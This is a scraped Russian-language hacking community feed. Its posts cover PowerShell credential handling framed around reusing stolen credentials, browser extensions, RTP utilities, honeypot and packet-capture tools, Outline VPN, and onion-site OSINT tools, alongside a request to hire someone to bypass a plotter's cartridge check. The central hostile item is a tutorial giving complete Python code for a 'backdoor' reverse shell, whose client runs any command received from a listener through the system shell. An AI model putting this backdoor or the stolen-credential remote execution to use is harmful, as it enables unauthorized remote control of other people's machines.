Сообщество - Life-Hack [Жизнь-Взлом]/Хакинг
Добавить пост

Life-Hack [Жизнь-Взлом]/Хакинг

251 пост 2 696 подписчиков

Популярные теги в сообществе:

Ищу хакера

По работе возникает необходимость печати чертежей на плоттерах HP DesignJet T520. К этим плоттерам на сайте HP есть бесплатная программа HP Click, которая очень сильно экономит бумагу при печати нестандартных форматов (например параллельно размещает чертежи на рулоне, если они узкие). Можно закинуть сразу кучу файлов, изменить формат, если он не указан и т.п. Очень удобная. Но у нее есть ограничение - она не работает, если в плоттере стоят неоригинальные или перезаправленные картриджи. По понятным причинам это условие соблюдать всё сложнее.
В связи с этим ищу хакера, который мог бы за разумную плату обойти это ограничение.
Ну или может есть какие-то другие альтернативные программы для тех же целей. Печатаем в основном из PDF.

Шифрование и дешифрование в PowerShell

В PowerShell командлеты ConvertTo-SecureString и ConvertFrom-SecureString можно использовать для шифрования и дешифрования стандартной строки System.String в System.Security.SecureString.

Пример: строка шифруется и сохраняется в переменной:

data = "This is some extremely important data"

$encryptedData = ConvertTo-SecureString -String $data -AsPlainText

При введении имя переменной, содержащей зашифрованную строку, то увидим ее тип System.Security.SecureString (в картинке)

Также можем расшифровать данные, хранящиеся в объекте System.Security.SecureString, следующим образом:

ConvertFrom-SecureString -SecureString $encryptedData -AsPlainText

Использование зашифрованных строк для учетных данных PowerShell

Возможность выполнения командлета от имени другого пользователя – полезная опция, особенно для Red Team-ов, которые могут использовать украденные учетные данные для взлома удаленной машины. Для указания учетных данных, необходимых при запуске командлета, используется параметр Credential, который требует объект PSCredential. Для создания этого объекта необходимо указать имя пользователя и зашифрованный пароль.

Рекомендуется использовать командлет Read-Host с параметром AsSecureString для ввода пароля в безопасной форме, т.к. это предотвратит регистрацию учетных данных в журналах PowerShell.

С помощью кода PowerShell можно считывать данные со стандартного ввода и сохранять их в переменной в виде защищенной строки:

$password = Read-Host -AsSecureString

Затем можем взять эту безопасную строку и создать требуемый объект PSCredential:

$Cred = New-Object System.Management.Automation.PSCredential("domain\user", $password)

Теперь можем использовать этот объект PSCredential с командлетами, позволяющими указать параметр Credential. Вот как выполняется командлет Invoke-Command на удаленной машине с WINRM от имени другого пользователя, используя созданный нами PSCredential:

Invoke-Command -Credential $Cred -ScriptBlock { whoami } -ComputerName 10.10.1.11

Информация предоставлена исключительно для ознакомительных целей!

Мы в телеграме!

Показать полностью

Расширения Google Chrome для хакеров

1️⃣ Wappalzyer - получает самую свежую информацию о том, какие технологии использует любой веб-сайт (веб-приложение).

2️⃣ User Agent switcher - подделывает ответ пользовательского агента, который он отправляет на веб-сайт о вашем устройстве, размере экрана и т. д.

3️⃣ Retire.js - позволяет вам обнаруживать (находить) любые скрытые устаревшие версии javascript, которые можно использовать для атаки.

4️⃣ Cookie editor - позволяет любому пользователю редактировать файлы cookie. Этот инструмент полезен при захвате уязвимой сессии.

5️⃣ Hackbar - расширение для тестирования на проникновение. Hackbar похож на burpsuite, но в браузере.

Мы в телеграме!

Создание бэкдора на Python

Бэкдор — это инструмент, который позволяет хакеру удаленно подключиться к целевой машине. В этой статье я покажу, как создать простой бэкдор на Pyhton

Основная цель бэкдора — отправлять и выполнять команды и получить удаленный доступ к файлам на целевой системе.

Создание бэкдора на Python

Во-первых, мы должны создать сервер, на котором будем работать. Сервер будет состоять из четырех частей:

1) Получение нашего локального IP и указанного порта.

2) Привязка IP-адреса и порта для создания сокета.

3) Запуск слушателя.

4) Отправка и получение команд в бесконечном цикле.

# Imports

import socket

# Getting our local IP and a specified port

HOST = '127.0.0.1' # '192.168.43.82'

PORT = 8081 # 2222

new_port = input('Input Host Port (Blank if default).')

if (new_port != "\n"):

REMOTE_PORT = new_port

# Binding the IP to the Port

# Creating a Socket

server = socket.socket()

server.bind((HOST, PORT))

# Starting the Listener

print('[+] Server Started')

print('[+] Listening For Client Connection ...')

server.listen(1)

client, client_addr = server.accept()

print(f'[+] {client_addr} Client connected to the server')

# Sending and receiving commands in an infinite loop

while True:

command = input('Enter Command : ')

command = command.encode()

client.send(command)

print('[+] Command sent')

output = client.recv(1024)

output = output.decode()

print(f"Output: {output}")

Затем мы подключимся к атакующему на основе жестко запрограммированного IP-адреса и порта, поскольку он не может получить их динамически.

Поскольку мы запускаем эту обратную оболочку на локальной машине, сокет будет выглядеть так:

REMOTE_HOST = '127.0.0.1'

REMOTE_PORT = 8081 # 2222

client = socket.socket()

Далее мы должны получать команды и использовать библиотечный подпроцесс для открытия терминала и параллельного запуска команд. Вот как это будет выглядеть:

command = client.recv(1024)

command = command.decode()

op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

Полный код сервера выглядит следующим образом:

# Imports

from ctypes.wintypes import INT

import socket

import subprocess

# Setting Up IP/Sockets

REMOTE_HOST = '127.0.0.1'

REMOTE_PORT = 8081 # 2222

client = socket.socket()

# Initializing Connection

print("[-] Connection Initiating...")

client.connect((REMOTE_HOST, REMOTE_PORT))

print("[-] Connection initiated!")

# Runtime Loop

while True:

print("[-] Awaiting commands...")

command = client.recv(1024)

command = command.decode()

op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

output = op.stdout.read()

output_error = op.stderr.read()

print("[-] Sending response...")

client.send(output + output_error)

Информация предоставлена для ознакомительных целей!
Мы в телеграме!

Показать полностью

RTP Tools

Набор инструментов для тестирования и анализа сетевых соединений на основе протокола RTP, который используется в системах передачи видео, аудио и голосовой связи через Интернет.

Основные инструменты:

1. rtpdump: предназначен для анализа содержимого RTP-потока. Он позволяет просматривать данные RTP-пакета, такие как счетчики, тайминги, нагрузка и т.д.

2. rtpplay: позволяет проигрывать файлы, содержащие RTP-потоки обратно через сеть. Он может быть использован для тестирования RTP приложений и оборудования.

3. rtpsend: генерирует RTP-поток с заданной частотой дискретизации и скоростью передачи данных. Это можно использовать для тестирования оборудования и приложений.

Анализируем RTP-пакеты

rtpdump - это утилита командной строки в Linux, которая позволяет анализировать содержимое RTP-потоков.

Примеры использования:

rtpdump -i eth0 -F ascii > output.txt

Данный пример захватывает все RTP-пакеты на сетевом интерфейсе eth0 и записывает их содержимое в текстовый файл output.txt в формате ASCII.

rtpdump -F hex -n -t 20200101010101 -u 172.16.0.1 < input.pcap > output.txt

Анализ RTP-потока, записанного в файл input.pcap, с использованием формата вывода hex, ограничивая вывод только пакетами с IP-адресом 172.16.0.1, записанными в период с 1 января 2020 года, 01:01:01, и сохраняя результат в файл output.txt.

rtpdump -r input.pcap -s 0 -t 20210101120000 -T s

Отображение статистики RTP-потока, записанного в файл input.pcap с использованием таймстампов из файла pcap, включая информацию о количестве переданных и принятых RTP-пакетов, среднем размере пакетов и задержке в секундах.

Воспроизводим записанные RTP-потоки

rtpplay - это утилита командной строки в Linux, которая позволяет воспроизводить записанные RTP-потоки.

Примеры использования:

rtpplay input.rtp

воспроизводит RTP-поток, записанный в файл input.rtp.

rtpplay -s 10 input.rtp

воспроизводит RTP-поток из файла input.rtp со смещением времени на 10 секунд.

rtpplay -T 50 input.rtp

воспроизводит RTP-поток из файла input.rtp с ограничением скорости 50%.

rtpplay input.rtp &

воспроизводит RTP-поток в фоновом режиме

Отправляем RTP-пакеты на удаленный хост

rtpsend - это утилита командной строки в Linux, которая позволяет отправлять RTP-пакеты на удаленный хост.

Примеры использования:

1. Отправка RTP-пакетов на удаленный хост:

rtpsend -a <удаленный IP-адрес> -p <порт> -F <формат> -f <файл с данными>

2. Отправка RTP-пакетов с использованием RTCP-отчетности:

rtpsend -a <удаленный IP-адрес> -p <порт> -F <формат> -f <файл с данными> -t <интервал RTCP>

3. Отправка RTP-пакетов с заданным TTL:

rtpsend -a <удаленный IP-адрес> -p <порт> -F <формат> -f <файл с данными> -T <TTL>

TTL - это время жизни пакета в секундах до его уничтожения, если он так и не достиг назначенного адресата.

Мы в телеграме!

Показать полностью

Инструменты тестирования на проникновение в сеть. Часть 2

HoneyPot / HoneyNet

Glastopf – это инструмент для отслеживания инцидентов сетевой безопасности. Может эмулировать тысячи уязвимостей для сбора данных в результате атак, нацеленных на веб-приложения.

Kippo – это SSH HoneyPot среднего взаимодействия, предназначенный для регистрации атак методом перебора.

Kojoney – это низкоуровневая приманка для взаимодействия, которая эмулирует SSH-сервер.

HonSSH – это решение HoneyPot с высоким уровнем взаимодействия. HonSSH будет находиться между злоумышленником и HoneyPot, создавая между ними два отдельных SSH-соединения.

Bifrozt – это NAT-устройство с DHCP-сервером, которое обычно развертывается с одной сетевой картой, подключенной непосредственно к Интернету, и одной сетевой картой, подключенной к внутренней сети.

HoneyDrive – HoneyDrive является ведущим дистрибутивом HoneyPot Linux. Это виртуальное устройство (OVA) с установленным Xubuntu Desktop LTS edition.

Cuckoo Sandbox – это программное обеспечение с открытым исходным кодом для автоматизации анализа подозрительных файлов.

HoneyPy – это открытое программное обеспечение, которое используется для обнаружения и сбора информации о злоумышленниках и их атаках.

Dionaea – это открытый инструмент для отслеживания инцидентов сетевой безопасности. Dionaea был создан для отслеживания различных типов сетевых атаки, включая вирусы, шпионское ПО и т.д.

Conpot (ICS/SCADA HoneyPot) – это низкоинтерактивная приманка для промышленных систем управления на стороне сервера, разработанная для простого развертывания, модификации и расширения.

Amun – приманка с низким уровнем взаимодействия на основе Python.

Полный захват пакетов

OpenFPC – представляет собой набор инструментов, которые в совокупности обеспечивают облегченную систему записи и буферизации сетевого трафика с полным пакетом.

Dshell – это платформа для криминалистического анализа сети. Позволяет быстро разрабатывать плагины для поддержки анализа перехваченных сетевых пакетов.

stenographer – это решение для захвата пакетов, целью которого является быстрая загрузка всех пакетов на диск, а затем предоставление простого и быстрого доступа к подмножествам этих пакетов.

tcpflow – это программа, которая фиксирует данные, передаваемые как часть TCP-соединений, и сохраняет данные удобным для анализа и отладки протокола способом.

Xplico – инструмент для извлечения из интернет-трафика данных, содержащихся в приложениях.

Moloch – это система с открытым исходным кодом для крупномасштабного захвата пакетов IPv4 (PCAP) и индексирования. Для просмотра, поиска и экспорта PCAP предоставляется простой веб-интерфейс.

Средства сетевой безопасности на основе снифферов

Live HTTP headers – это бесплатное дополнение для Firefox, позволяющее просматривать запросы браузера в режиме реального времени.

netsniff-ng – это бесплатный сетевой инструментарий для Linux.

wireshark – это бесплатный анализатор пакетов с открытым исходным кодом.

Мы в телеграме!

Показать полностью

Использование протокола Outline VPN: достоинства и недостатки

Outline VPN использует протокол Shadowsocks для обмена данными между клиентом и сервером.

Особенности протокола

- Shadowsocks обладает быстрой и легкой производительностью за счет использования простых методов шифрования, которые не влияют на скорость соединения.

- Shadowsocks предоставляет гибкие настройки, такие как выбор алгоритмов шифрования, портов и протоколов, которые можно настроить в зависимости от потребностей пользователя.

-  Shadowsocks обеспечивает высокую незаметность и устойчивость благодаря маскировке своего трафика, который похож на обычный HTTPS-трафик, затрудняющий обнаружение или блокирование методами сетевой безопасности.

- Shadowsocks является открытым и сообщественным инструментом, обладающим большим и активным сообществом разработчиков.

Достоинства

1. Легкость использования: Outline VPN не требует от пользователей сложных настроек и технических знаний для создания и запуска собственного VPN-сервера. Он поддерживает Windows, macOS и Linux, а Outline Client доступен для Windows, macOS, Linux, ChromeOS, Android и iOS.

2. Безопасность и конфиденциальность: Outline VPN обеспечивает высокий уровень безопасности и конфиденциальности, шифруя и аутентифицируя трафик пользователей с помощью современных алгоритмов. Его не интересует журнал трафика пользователей или личные данные.

3. Экономия ресурсов: С помощью Outline VPN пользователи могут экономить денежные и ресурсные средства, выбирая местоположение и провайдера своего VPN-сервера и используя самостоятельный хостинг или облачные сервисы, такие как DigitalOcean, Rackspace, Google Cloud Platform и Amazon EC2.

4. Гибкость использования: Outline VPN позволяет пользователям легко делиться доступом к своему VPN-серверу с возможностью создания уникальных ключей доступа и их отправки через электронную почту или социальные сети. Он также масштабируем и гибкий с возможностью поддержки сотен пользователей или простого деления доступа со своими близкими контактами.

Недостатки

1. Анонимность не полна: Использование Outline VPN не скрывает от провайдера интернет-услуг того факта, что пользователь использует VPN-сервер. Это может привести к блокировке или ограничению доступа к VPN-серверу со стороны провайдера или правительства. Кроме того, для увеличения анонимности пользователя, Outline VPN не поддерживает Tor или другие средства.

2. Доступность не гарантирована: Работоспособность Outline VPN зависит от доступности и качества VPN-сервера, который может подвергаться сбоям, атакам или перегрузкам. Если VPN-сервер недоступен или работает медленно, подключение к интернету через Outline VPN невозможно. Пользователи должны следить за обновлениями и безопасностью своего VPN-сервера самостоятельно.

3. Эффективность может быть ущербной: Выбор определенных стран для использования Outline VPN может стать невозможным из-за блокировок или ограничений протокола Shadowsocks. Например, в Китае правительство активно борется с использованием VPN-сервисов и использует различные методы для обнаружения и блокировки трафика Shadowsocks. Решение изменять настройки VPN-сервера или клиента, чтобы обойти эти ограничения, может быть сложным и сопряженным с рисками.

Для устранения этих недостатков и улучшения протокола Outline VPN можно предложить следующие решения и предложения:

Источник

Показать полностью

Поиграем в бизнесменов?

Одна вакансия, два кандидата. Сможете выбрать лучшего? И так пять раз.

СДЕЛАТЬ ВЫБОР

Инструменты OSINT для Onion сайтов

Небольшой список полезных инструментов для работы с сайтами в сети Tor.

Поисковые утилиты:

OnionSearch - https://github.com/megadose/OnionSearch

Darkdump - https://github.com/josh0xA/darkdump

Ahmia Search Engine - ahmia.fi, https://github.com/ahmia/ahmia-site,

DarkSearch - https://darksearch.io/, https://github.com/thehappydinoa/DarkSearch

Katana - https://github.com/adnane-X-tebbaa/Katana

Инструменты для получения onion ссылок:

Hunchly - https://www.hunch.ly/darkweb-osint/

H-Indexer - http://jncyepk6zbnosf4p.onion/onions.html

Tor66 Fresh Onions - http://tor66sewebgixwhcqfnp5inzp5x5uohhdy3kvtnyfxc2e5mxiuh34iid.onion/fresh

Инструменты для сканирования:

Onionscan - https://github.com/s-rah/onionscan

Onioff - https://github.com/k4m4/onioff

Onion-nmap - https://github.com/milesrichardson/docker-onion-nmap

Краулеры:

TorBot - https://github.com/DedSecInside/TorBot

TorCrawl - https://github.com/MikeMeliz/TorCrawl.py

VigilantOnion - https://github.com/andreyglauzer/VigilantOnion

OnionIngestor - https://github.com/danieleperera/OnionIngestor

Прочее:

DeepDarkCTI - https://github.com/fastfire/deepdarkCTI

Мы в телеграме!

Показать полностью
Отличная работа, все прочитано!